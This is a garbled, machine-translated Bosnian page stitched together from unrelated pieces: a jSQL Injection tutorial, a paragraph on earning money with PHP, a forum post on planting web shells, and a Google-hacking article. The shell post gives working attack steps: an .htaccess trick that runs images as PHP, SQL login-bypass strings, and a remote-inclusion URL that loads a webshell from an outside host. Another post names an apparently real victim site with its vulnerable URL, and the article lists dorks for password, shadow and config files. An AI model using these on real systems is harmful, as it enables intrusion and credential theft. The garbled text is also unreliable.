Inurl php poglavlje broj lični nalog. Kako zaraditi novac poznavanjem PHP-a? Ne zaboravimo očigledno

Pokrenite preuzetu datoteku dvostrukim klikom (morate imati virtuelna mašina ).

3. Anonimnost prilikom provjere stranice za SQL injekciju

Postavljanje Tor i Privoxy u Kali Linuxu

[Odjeljak u razvoju]

Postavljanje Tor i Privoxy na Windows

[Odjeljak u razvoju]

Proxy postavke u jSQL injekciji

[Odjeljak u razvoju]

4. Provjera stranice za SQL injekciju s jSQL injekcijom

Rad sa programom je izuzetno jednostavan. Samo unesite adresu web stranice i pritisnite ENTER.

Sljedeći snimak ekrana pokazuje da je stranica ranjiva na tri vrste SQL injekcija (informacije o njima su naznačene u donjem desnom kutu). Klikom na nazive injekcija možete promijeniti korišteni metod:

Također, postojeće baze podataka su nam već prikazane.

Možete pogledati sadržaj svake tabele:

Obično je najzanimljivija stvar u vezi sa tabelama administratorski akreditivi.

Ako imate sreće i nađete podatke administratora, onda je prerano za radovanje. Još uvijek morate pronaći admin panel gdje ćete unijeti ove podatke.

5. Potražite admin panele sa jSQL injekcijom

Da biste to učinili, idite na sljedeću karticu. Ovdje nas dočekuje lista mogućih adresa. Možete odabrati jednu ili više stranica za provjeru:

Pogodnost leži u činjenici da ne morate koristiti druge programe.

Nažalost, nema mnogo nemarnih programera koji čuvaju lozinke u čistom tekstu. Vrlo često u redu lozinke vidimo nešto slično

8743b52063cd84097a65d1633f5c74f5

Ovo je heš. Možete ga dešifrirati koristeći grubu silu. I... jSQL Injection ima ugrađeni brute forcer.

6. Brute force hashovi koristeći jSQL injekciju

Nesumnjiva pogodnost je što ne morate tražiti druge programe. Postoji podrška za mnoge od najpopularnijih hashova.

Ovo nije najviše najbolja opcija. Da biste postali guru u dekodiranju heševa, preporučuje se knjiga “” na ruskom.

Ali, naravno, kada nema drugog programa pri ruci ili nema vremena za učenje, jSQL Injection sa svojom ugrađenom brute force funkcijom će dobro doći.

Postoje postavke: možete podesiti koji znakovi su uključeni u lozinku, raspon dužine lozinke.

7. Operacije datoteka nakon otkrivanja SQL injekcija

Osim operacija s bazama podataka - čitanje i modificiranje istih, ako se otkriju SQL injekcije, mogu se izvršiti sljedeće operacije sa datotekama:

  • čitanje datoteka na serveru
  • učitavanje novih fajlova na server
  • učitavanje školjki na server

I sve je to implementirano u jSQL Injection!

Postoje ograničenja - SQL server mora imati privilegije datoteka. Oni razumni administratori sistema oni su onemogućeni i imaju pristup sistem podataka neće moći dobiti.

Prisutnost privilegija datoteka je prilično jednostavno provjeriti. Idite na jednu od kartica (čitanje datoteka, kreiranje ljuske, učitavanje nove datoteke) i pokušajte izvršiti jednu od navedenih operacija.

Još jedna vrlo važna napomena - moramo znati tačnu apsolutnu putanju do datoteke sa kojom ćemo raditi - inače ništa neće raditi.

Pogledajte sljedeći snimak ekrana:

Na svaki pokušaj rada na fajlu, primamo sljedeći odgovor: Nema privilegija FILE(bez privilegija datoteka). I tu se ništa ne može učiniti.

Ako umjesto toga imate drugu grešku:

Problem sa pisanjem u [directory_name]

To znači da ste pogrešno naveli apsolutnu putanju na koju želite da upišete datoteku.

Da biste pogodili apsolutnu putanju, morate barem znati operativni sistem na kojem server radi. Da biste to učinili, prijeđite na karticu Mreža.

Takav zapis (red Win64) daje nam razloga da pretpostavimo da imamo posla sa Windows OS:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Veza: Keep-Alive Metod: HTTP/1.1 200 OK Dužina sadržaja: 353 Datum: pet, 11. decembar 2015. 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Ovdje imamo neki Unix (*BSD, Linux):

Transfer-Encoding: chunked Datum: pet, 11. decembar 2015. 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Veza: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

I ovdje imamo CentOS:

Metoda: HTTP/1.1 200 OK Ističe: čet, 19. novembar 1981. 08:52:00 GMT Set-kolačić: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Veza: Keep-alive X-Cache-Lookup: MISS sa t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS od t1.hoster.ru Cache-Control: nema skladištenja, nema predmemorije, mora se ponovo potvrditi, post-check=0, pre-check=0 Pragma: nema predmemorije Datum: pet, 11. decembar 2015. 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

Na Windows-u, tipičan folder za web lokacije je C:\Server\data\htdocs\. Ali, u stvari, ako je neko "smislio" da napravi server na Windows-u, onda, vrlo verovatno, ta osoba nije čula ništa o privilegijama. Stoga, trebali biste početi pokušavati direktno iz C:/Windows/ direktorija:

Kao što vidite, prvi put je sve prošlo kako treba.

Ali same ljuske za jSQL injekciju izazivaju sumnje u mom umu. Ako imate privilegije za fajlove, onda možete lako da otpremite nešto preko web interfejsa.

8. Grupna provjera lokacija za SQL injekcije

Čak je i ova funkcija dostupna u jSQL injekciji. Sve je krajnje jednostavno - preuzmite listu stranica (može se uvesti iz datoteke), odaberite one koje želite provjeriti i kliknite na odgovarajuće dugme da započnete operaciju.

Zaključak iz jSQL injekcije

jSQL Injection je dobar, moćan alat za pretraživanje i zatim korištenje SQL injekcija koje se nalaze na web stranicama. Njegove nesumnjive prednosti: jednostavnost korištenja, ugrađene povezane funkcije. jSQL Injekcija može postati najbolji prijatelj novost u analizi web stranica.

Među nedostacima bih istakao nemogućnost uređivanja baza podataka (do najmanje Nisam pronašao ovu funkciju). Kao i svi instrumenti sa grafički interfejs, jedan od nedostataka ovog programa može se pripisati nemogućnosti njegove upotrebe u skriptama. Ipak, moguća je i određena automatizacija u ovom programu - zahvaljujući ugrađenoj funkciji masovnog skeniranja sajta.

utvrđeni uzorak i sertifikat. By poseban popust za sve fakultete i kurseve!

Sa pojavom kompjutera i interneta, pojavile su se mnoge dodatne profesije.


Stručnjaci za programiranje su sada traženi, jer se mnogo različitih projekata pokreće putem interneta. Stoga bi svi kandidati trebali razmisliti o izboru specijalnosti koja se odnosi na računare.

Kako zaraditi novac poznavanjem PHP-a? U ovom članku ćemo se osvrnuti na jedno od područja programiranja. Skriptni jezik se aktivno koristi za razvoj aplikacija.

Tehnologija je relevantna dugi niz godina, a ako naučite PHP, možete dobro zaraditi. Najvažnije je da je potražnja za stručnjacima u ovoj oblasti ogromna.

Koliko zarađuje PHP programer?

Nemoguće je navesti tačan iznos, jer svi rade različite kompanije, a neki čak i rade od kuće. U svakom slučaju, aktivni radnici primaju dobru platu.

Oni koji rade ne izlazeći iz kuće dobijaju tačno onoliko koliko uspeju da završe narudžbine. Cijene u niši se rijetko određuju, najčešće se dogovaraju pojedinačno.

Sa pozitivne strane PHP rad Kao programer, vrijedi napomenuti ozbiljne izglede i relevantnost aktivnosti. U vrijeme kada internet prodire u gotovo sve oblasti, raditi kao programer je zaista isplativo.


U ovom članku želim govoriti o najčešće korištenim metodama učitavanja ljuske na web stranicu. Web-ljuska je vrsta zlonamjerne skripte (programa) koju napadači koriste za kontrolu web stranica ili servera.

Metoda 1
Pronađite obrazac na web stranici za postavljanje datoteka/slika. Recimo da nismo uspjeli hakovati admin panel stranice i pokušavamo preplaviti našu ljusku sa extension.php.jpg . Ako bude uspješan, vidjet ćemo bijeli prozor umjesto slike, kliknemo desnim tasterom miša i pratimo link. U slučaju kvara možemo koristiti hromirani nastavak neovlašteni podaci. Omogućava vam da presretnete i promijenite zahtjev kako želite. Ako web lokacija provjeri ekstenziju datoteke, onda prvo možemo učitati .htaccess fajl sa sadržajem:
AddType application/x-httpd-php .jpg
Ova komanda će biti dovoljna jpg datoteke poput php.
Detaljne video upute:

Video uputstva za instalacija neovlaštenih podataka:


Metoda 2
Koristite program za pretraživanje admin panela na stranici - https://github.com/bdblackhat/admin-panel-finder. Kada program pronađe admin panel, možemo pokušati sql-injection. U polje za prijavu i lozinku na stranici upisujemo kod:

" ili "1"="1 " ILI 1=1/*

Ako radi, dolazimo do administratorske ploče i Nastavljamo prema metodi 1. Ako nema sql-injekcije u admin panelu na sajtu, onda možemo pokušati da ga otklonimo ili pronađemo eksploataciju za ovaj CMS.
Detaljne video upute:


Metoda 3
U metodi 3 tražićemo sql-injekciju na samom sajtu. To možemo učiniti ručno ili koristiti sqlmap. Na forumu ima dovoljno tema o tome kako se daju injekcije, pa ću doći izdaleka. Dakle, sada smo već pronašli tablicu s administratorskom prijavom i lozinkom, dešifrirajte hashove, idite na administratorsku ploču i radujte se. Ali recimo da nismo mogli dešifrirati lozinku i sve je pošlo po zlu, onda moramo provjeriti privilegije našeg korisnika . Provjeravamo privilegije i učitavamo mini-ljusku. Iz nekog razloga, kada želim da zalijepim kod, stranica mi daje grešku.

Metoda 4
Metoda 4 uključuje csrf napad. U donjem kodu moramo zamijeniti http:// na našu ciljnu vezu. Odaberite školjku i pritisnite dugme upload.



Metoda 5
Saznajte više o svojoj meti i pronađite eksploataciju. Za to postoji vrlo zanimljiva web stranica - https://www.exploit-db.com. Niko nije otkazao masovno hakovanje web stranica kroz ranjivosti, ali već postoji članak o tome na obrascu.

Postoji mnogo više načina za popunjavanje ljuske i nema smisla govoriti o svakom od njih. Ako želite da vježbate, onda instalirajte dvwa - to je program dizajniran da pomogne sigurnosnim stručnjacima da testiraju svoje vještine i alate u legalnom okruženju.

Metoda 6
PHP injekcija- ovo je oblik napada na web stranicu kada napadač ubacuje svoj PHP kod u napadnutu PHP aplikaciju.

www.site.ru?page=home.html
Izvršavanjem naredbe učitat ćemo početnu,html stranicu. Sada ćemo pokušati učitati zlonamjernu školjku.
www.site.ru?page=http://hacker.ru/webshell.php
glupan: Inurl:page=

Postoji i način da pronađete već učitanu ljusku koristeći perl

I tako, sada ću vam reći kako da hakujete nešto bez nekog posebnog znanja. Odmah ću reći da je malo koristi od ovoga, ali ipak.
Prvo morate pronaći same stranice. Da biste to učinili, idite na google.com i potražite dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

evo male liste. Možete koristiti svoje. I tako, pronašli smo sajt. Na primjer http://www.vestitambov.ru/
Zatim preuzmite ovaj program

**Skriveni sadržaj: Da biste vidjeli ovaj skriveni sadržaj, vaš broj objava mora biti 3 ili veći.**

Kliknite OK. Zatim ubacujemo mjesto žrtve.
Pritisnemo start. Zatim čekamo rezultate.
I tako, program je pronašao SQL ranjivost.

Zatim preuzmite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= tamo zalijepite primljenu vezu. Neću objašnjavati kako koristiti Havij i gdje ga preuzeti; nije ga teško pronaći. Sve. Dobili ste podatke koji su vam potrebni - administratorsku lozinku, a onda je na vašoj mašti.

P.S. Ovo je moj prvi pokušaj da nešto napišem. Izvinite ako nešto nije u redu

Pretraživač Google sistem(www.google.com) nudi mnoge opcije pretraživanja. Sve ove karakteristike su neprocjenjiv alat za pretraživanje za korisnika koji je tek na Internetu i u isto vrijeme još moćnije oružje invazije i uništenja u rukama ljudi sa zlim namjerama, uključujući ne samo hakere, već i neračunarske kriminalce i čak i teroristi.
(9475 pregleda u 1 sedmici)

Denis Barankov
denisNOSPAMixi.ru

pažnja:Ovaj članak nije vodič za akciju. Ovaj članak je napisan za vas, administratore WEB servera, kako biste izgubili lažni osjećaj da ste sigurni i konačno shvatili podmuklost ovog načina dobivanja informacija i prihvatili se zadatka zaštite vaše stranice.

Uvod

Na primjer, pronašao sam 1670 stranica za 0,14 sekundi!

2. Unesite drugi red, na primjer:

inurl:"auth_user_file.txt"

malo manje, ali ovo je već dovoljno za besplatno preuzimanje i pogađanje lozinke (koristeći isti John The Ripper). U nastavku ću dati još nekoliko primjera.

Dakle, morate shvatiti da je Google pretraživač posjetio većinu internet stranica i keširao informacije koje se nalaze na njima. Ove keširane informacije vam omogućavaju da dobijete informacije o stranici i sadržaju stranice bez direktnog povezivanja na stranicu, samo udubljivanjem u informacije koje su pohranjene u Google-u. Štoviše, ako informacije na web-mjestu više nisu dostupne, informacije u predmemoriji mogu i dalje biti sačuvane. Sve što vam je potrebno za ovu metodu: znate neke ključne riječi Google. Ova tehnika se zove Google Hacking.

Informacije o Google Hackingu prvi put su se pojavile na Bugtruck mailing listi prije 3 godine. Ovu temu je 2001. pokrenuo francuski student. Evo veze do ovog pisma http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Pruža prve primjere takvih upita:

1) Indeks /admin
2) Indeks /password
3) Indeks /mail
4) Indeks / +banques +filetype:xls (za francusku...)
5) Indeks / +passwd
6) Indeks / password.txt

Ova tema je nedavno izazvala talase u delu interneta za čitanje na engleskom: nakon članka Džonija Longa, objavljenog 7. maja 2004. Za potpuniju studiju Google Hackinga, savjetujem vam da posjetite web stranicu ovog autora http://johnny.ihackstuff.com. U ovom članku samo želim da vas obavijestim o novostima.

Ko ovo može koristiti:
- Novinari, špijuni i svi oni koji vole da zabadaju nos u tuđe poslove mogu to iskoristiti za traženje inkriminirajućih dokaza.
- Hakeri traže pogodne mete za hakovanje.

Kako Google funkcionira.

Da nastavite razgovor, da vas podsjetim na neke od ključnih riječi koje se koriste u Google upitima.

Pretražujte pomoću znaka +

Google isključuje riječi koje smatra nevažnim iz pretraživanja. Na primjer, upitne riječi, prijedlozi i članci u engleski jezik: na primjer su, od, gdje. Čini se da na ruskom Google sve riječi smatra važnim. Ako se neka riječ isključi iz pretrage, Google piše o tome. To Google je počeo da biste tražili stranice sa ovim riječima, morate dodati znak + bez razmaka prije riječi. Na primjer:

as +osnova

Tražite pomoću znaka –

Ako Google pronađe veliki broj stranica sa kojih treba isključiti stranice s određenom temom, onda možete natjerati Google da traži samo stranice koje ne sadrže određene riječi. Da biste to učinili, trebate naznačiti ove riječi tako što ćete staviti znak ispred svake - bez razmaka prije riječi. Na primjer:

ribolov - votka

Pretražujte pomoću ~

Možda ćete htjeti pretraživati ​​ne samo navedenu riječ, već i njene sinonime. Da biste to učinili, ispred riječi stavite simbol ~.

Pronalaženje tačne fraze pomoću dvostrukih navodnika

Google na svakoj stranici traži sva pojavljivanja riječi koje ste napisali u nizu upita i ne brine o relativnom položaju riječi, sve dok se sve navedene riječi nalaze na stranici u isto vrijeme (ovo je zadana radnja). Da biste pronašli tačnu frazu, morate je staviti pod navodnike. Na primjer:

"držač za knjige"

Da bi se pojavila barem jedna od navedenih riječi, morate navesti logička operacija eksplicitno: ILI. Na primjer:

knjiga sigurnost ILI zaštita

Osim toga, možete koristiti znak * u traci za pretraživanje da označite bilo koju riječ i. da predstavlja bilo koji lik.

Potražite riječi koristeći dodatni operateri

Postoji operatori pretraživanja, koji su naznačeni u nizu za pretraživanje u formatu:

operator:pojam_traži

Razmaci pored debelog creva nisu potrebni. Ako umetnete razmak iza dvotačke, vidjet ćete poruku o grešci, a prije nje, Google će ih koristiti kao normalni niz za pretraživanje.
Postoje grupe dodatnih operatora pretraživanja: jezici - naznačite na kojem jeziku želite da vidite rezultat, datum - ograničite rezultate za posljednja tri, šest ili 12 mjeseci, pojavljivanja - označite gdje u dokumentu trebate tražiti red: svugdje, u naslovu, u URL-u, domene - pretražite na navedenom web-mjestu ili, obrnuto, isključite ga iz pretraživanja; sigurno pretraživanje - blokira stranice koje sadrže navedenu vrstu informacija i uklanja ih sa stranica s rezultatima pretraživanja.
Međutim, neki operateri ne zahtijevaju dodatni parametar, na primjer zahtjev " cache: www.google.com" može se nazvati kao punopravni niz za pretraživanje, a neke ključne riječi, naprotiv, zahtijevaju riječ za pretraživanje, na primjer " web stranica:www.google.com pomoć". U svjetlu naše teme, pogledajmo sljedeće operatore:

Operater

Opis

Zahtijeva dodatni parametar?

pretražujte samo na web lokaciji navedenoj u search_term

pretražujte samo u dokumentima sa tipom search_term

pronaći stranice koje sadrže pojam za pretraživanje u naslovu

pronađite stranice koje sadrže sve riječi pojmova za pretraživanje u naslovu

pronađite stranice koje sadrže riječ search_term u svojoj adresi

pronađite stranice koje sadrže sve riječi pojmova za pretraživanje u svojoj adresi

Operater stranica: ograničava pretragu samo na navedenu lokaciju, a možete odrediti ne samo Ime domena, ali i IP adresu. Na primjer, unesite:

Operater vrsta datoteke: Ograničava pretragu na određenu vrstu datoteke. Na primjer:

Od datuma objavljivanja članka, Google može pretraživati ​​u 13 različitih formata datoteka:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint(ppt)
  • Microsoft Word(dok)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Format obogaćenog teksta (rtf)
  • Shockwave Flash(swf)
  • Tekst (ans, txt)

Operater veza: prikazuje sve stranice koje upućuju na navedenu stranicu.
Vjerovatno je uvijek zanimljivo vidjeti koliko mjesta na internetu zna za vas. Pokusajmo:

Operater skladiste: Prikazuje verziju stranice u Googleovoj keš memoriji kako je izgledala posljednji put kada je Google posjetio tu stranicu. Uzmimo bilo koju stranicu koja se često mijenja i pogledajmo:

Operater naslov: traži navedenu riječ u naslovu stranice. Operater allintitle: je ekstenzija - traži svih navedenih nekoliko riječi u naslovu stranice. uporedi:

naslov: let na Mars
intitle:flight intitle:on intitle:mars
allintitle: let na mars

Operater inurl: prisiljava Google da prikaže sve stranice koje sadrže navedeni niz u URL-u. allinurl operator: traži sve riječi u URL-u. Na primjer:

allinurl:acid acid_stat_alerts.php

Ova komanda je posebno korisna za one koji nemaju SNORT - barem mogu vidjeti kako funkcionira na stvarnom sistemu.

Metode hakovanja koristeći Google

Dakle, otkrili smo da korištenjem kombinacije gore navedenih operatora i ključnih riječi, svako može prikupiti potrebne informacije i potražiti ranjivosti. Ove tehnike se često nazivaju Google Hacking.

Mapa sajta

Možete koristiti site: operator za popis svih linkova koje je Google pronašao na web stranici. Obično se stranice koje se dinamički kreiraju pomoću skripti ne indeksiraju pomoću parametara, tako da neke web stranice koriste ISAPI filtere tako da veze nisu u obliku /article.asp?num=10&dst=5, i sa kosim crtama /article/abc/num/10/dst/5. To je učinjeno tako da se stranica općenito indeksira od strane pretraživača.

Pokusajmo:

site:www.whitehouse.gov Whitehouse

Google misli da svaka stranica na web stranici sadrži riječ whitehouse. Ovo je ono što koristimo da dobijemo sve stranice.
Postoji i pojednostavljena verzija:

site:whitehouse.gov

A najbolji dio je što drugovi iz whitehouse.gov nisu ni znali da smo pogledali strukturu njihove stranice, pa čak i keširane stranice koje je Google preuzeo. Ovo se može koristiti za proučavanje strukture sajtova i pregled sadržaja, koji za sada ostaje neotkriven.

Pogledajte listu fajlova u direktorijumima

WEB serveri mogu prikazati liste serverskih direktorija umjesto uobičajenih HTML stranice. Ovo se obično radi kako bi se osiguralo da korisnici odaberu i preuzmu određene datoteke. Međutim, u mnogim slučajevima, administratori nemaju namjeru prikazati sadržaj direktorija. Ovo se dešava zbog neispravne konfiguracije servera ili nedostatka početna stranica u imeniku. Kao rezultat toga, haker ima priliku pronaći nešto zanimljivo u imeniku i koristiti ga za svoje potrebe. Da biste pronašli sve takve stranice, dovoljno je napomenuti da sve sadrže riječi: index of. Ali kako riječi index of ne sadrže samo takve stranice, moramo precizirati upit i uzeti u obzir ključne riječi na samoj stranici, tako da upiti poput:

intitle:index.of roditeljski direktorij
intitle:index.of naziv veličine

Budući da je većina popisa direktorija namjerna, možda ćete imati teškoća da prvi put pronađete pogrešno postavljene liste. Ali barem već možete koristiti liste za određivanje WEB verzije server kao što je opisano u nastavku.

Dobijanje verzije WEB servera.

Poznavanje verzije WEB servera uvijek je korisno prije pokretanja bilo kakvog hakerskog napada. Opet, zahvaljujući Google-u, ove informacije možete dobiti bez povezivanja na server. Ako pažljivo pogledate listu direktorija, možete vidjeti da se tamo prikazuje naziv WEB servera i njegova verzija.

Apache1.3.29 - ProXad Server na trf296.free.fr Port 80

Iskusan administrator može promijeniti ove podatke, ali je, po pravilu, istinito. Dakle, za dobijanje ovih informacija dovoljno je poslati zahtev:

intitle:index.of server.at

Da bismo dobili informacije za određeni server, pojašnjavamo zahtjev:

intitle:index.of server.at site:ibm.com

Ili obrnuto, tražimo servere na kojima rade specifična verzija serveri:

intitle:index.of Apache/2.0.40 Server na

Ovu tehniku ​​može koristiti haker da pronađe žrtvu. Ako, na primjer, ima exploit za određenu verziju WEB servera, onda ga može pronaći i isprobati postojeći exploit.

Verziju servera možete dobiti i tako što ćete pregledati stranice koje su podrazumevano instalirane kada instalirate najnoviju verziju WEB servera. Na primjer, vidjeti test stranica Apache 1.2.6 samo ukucajte

intitle:Test.Page.for.Apache it.worked!

Štaviše, neke OS Prilikom instalacije odmah instaliraju i pokreću WEB server. Međutim, neki korisnici toga nisu ni svjesni. Naravno, ako vidite da neko nije uklonio podrazumevanu stranicu, onda je logično pretpostaviti da računar uopšte nije prošao nikakvo prilagođavanje i da je verovatno ranjiv na napade.

Pokušajte potražiti IIS 5.0 stranice

allintitle:Dobro došli u Windows 2000 Internet usluge

U slučaju IIS-a, možete odrediti ne samo verziju servera, već i Windows verzija i servisni paket.

Drugi način za određivanje verzije WEB servera je traženje priručnika (stranica pomoći) i primjera koji se mogu instalirati na web-mjestu prema zadanim postavkama. Hakeri su pronašli dosta načina da koriste ove komponente za dobijanje privilegovanog pristupa web lokaciji. Zbog toga morate ukloniti ove komponente na proizvodnom mjestu. Da ne spominjemo činjenicu da se prisustvo ovih komponenti može iskoristiti za dobijanje informacija o tipu servera i njegovoj verziji. Na primjer, pronađimo priručnik za apache:

inurl: ručni moduli apache direktiva

Korištenje Googlea kao CGI skenera.

CGI skener ili WEB skener je uslužni program za traženje ranjivih skripti i programa na serveru žrtve. Ovi uslužni programi moraju znati što tražiti, za to imaju čitavu listu ranjivih datoteka, na primjer:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Svaki od ovih fajlova možemo pronaći sa koristeći Google, koristeći dodatno uz naziv datoteke u liniji za pretraživanje riječi index of ili inurl: možemo pronaći stranice sa ranjivim skriptama, na primjer:

allinurl:/random_banner/index.cgi

Koristeći dodatno znanje, haker može iskoristiti ranjivost skripte i iskoristiti ovu ranjivost da prisili skriptu da emituje bilo koju datoteku pohranjenu na serveru. Na primjer, datoteka lozinke.

Kako se zaštititi od Google hakovanja.

1. Ne postavljajte važne podatke na WEB server.

Čak i ako ste privremeno objavili podatke, možete ih zaboraviti ili će neko imati vremena da pronađe i uzme te podatke prije nego što ih izbrišete. Ne radi to. Postoji mnogo drugih načina za prijenos podataka koji ih štite od krađe.

2. Provjerite svoju web stranicu.

Koristite opisane metode da istražite svoju web stranicu. Povremeno provjeravajte svoju web lokaciju za nove metode koje se pojavljuju na stranici http://johnny.ihackstuff.com. Zapamtite da ako želite automatizirati svoje radnje, morate dobiti posebnu dozvolu od Googlea. Ako pažljivo čitate http://www.google.com/terms_of_service.html, tada ćete vidjeti frazu: Ne smijete slati automatske upite bilo koje vrste Google-ovom sistemu bez izričitog prethodnog odobrenja Google-a.

3. Možda vam neće trebati Google za indeksiranje vaše stranice ili njenog dijela.

Google vam omogućava da uklonite link do vaše stranice ili njenog dijela iz baze podataka, kao i da uklonite stranice iz keša. Osim toga, možete zabraniti pretragu slika na Vašoj web stranici, zabraniti prikazivanje kratkih fragmenata stranica u rezultatima pretrage. Sve mogućnosti brisanja stranice su opisane na stranici http://www.google.com/remove.html. Da biste to učinili, morate potvrditi da ste stvarno vlasnik ove stranice ili umetnuti oznake na stranicu ili

4. Koristite robots.txt

Poznato je da pretraživači gledaju datoteku robots.txt koja se nalazi u korijenu stranice i ne indeksiraju one dijelove koji su označeni riječju Disallow. Ovo možete koristiti da spriječite indeksiranje dijela stranice. Na primjer, da spriječite indeksiranje cijele stranice, kreirajte robots.txt datoteku koja sadrži dva reda:

Korisnički agent: *
Disallow: /

Šta se još dešava

Da vam život ne bi izgledao kao med, na kraju ću reći da postoje stranice koje prate one ljude koji gore navedenim metodama traže rupe u skriptama i WEB serverima. Primjer takve stranice je

Aplikacija.

Malo slatko. Isprobajte i sami nešto od sljedećeg:

1. #mysql dump filetype:sql - traži dumpove baze podataka mySQL podaci
2. Sažetak izvještaja o ranjivosti domaćina - pokazat će vam koje su ranjivosti drugi ljudi pronašli
3. phpMyAdmin radi na inurl:main.php - ovo će prisiliti da se kontrola zatvori kroz phpmyadmin panel
4. nije za distribuciju povjerljivo
5. Zahtjev Details Control Tree Server Variables
6. Pokretanje u Child modu
7. Ovaj izvještaj je generirao WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – možda su nekome potrebne datoteke za konfiguraciju firewall-a? :)
10. naslov:indeks.finansije.xls – hmm....
11. intitle:Indeks dbconvert.exe ćaskanja – icq evidencije ćaskanja
12.intext:Tobias Oetiker analiza saobraćaja
13. intitle: Statistika upotrebe za Generirano od strane Webalizera
14. intitle: statistika napredne web statistike
15. intitle:index.of ws_ftp.ini – ws ftp konfiguracija
16. inurl:ipsec.secrets sadrži zajedničke tajne - tajni ključ - dobar pronalazak
17. inurl:main.php Dobrodošli u phpMyAdmin
18. inurl:server-info Informacije o Apache serveru
19. site:edu admin ocjene
20. ORA-00921: neočekivani kraj SQL naredbe – dobivanje staza
21. intitle:index.of trillian.ini
22. intitle: Indeks pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Indeks .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hakiranje mit Google"
